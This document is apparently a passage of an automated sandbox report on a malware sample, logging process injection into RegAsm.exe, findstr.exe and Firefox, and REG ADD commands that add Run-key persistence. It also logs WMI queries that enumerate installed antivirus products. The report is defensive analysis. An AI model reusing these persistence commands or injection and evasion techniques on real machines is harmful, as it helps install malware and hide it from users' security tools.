            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe protection: read write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exe Thread register set: target process: 7040
            Source: C:\Windows\SysWOW64\findstr.exe Thread APC queued: target process: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CA2008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 113E008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B20008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B9E008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C61008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11F6008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A66008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C6B008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: ADF008
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Process created: unknown unknown
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Users\user\Desktop\4Ear91jgQ7.exe VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq.exe.IUGVA\surivitnA\GVA\)68x( seliF margorP\:C`,cq.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq.exe.IUGVA\surivitnA\GVA\)68x( seliF margorP\:C`,cq(C:\Program Files\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2130989636.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2291247580.0000000000C22000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2324698880.0000000006262000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2541110729.0000000006A92000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2541110729.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2433569408.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2608623012.00000000066E7000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2551562808.0000000001331000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2743626575.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2658321483.0000000000C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq(C:\Program Files\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3135279069.000000000655E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: der\MsMpeng.exe
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
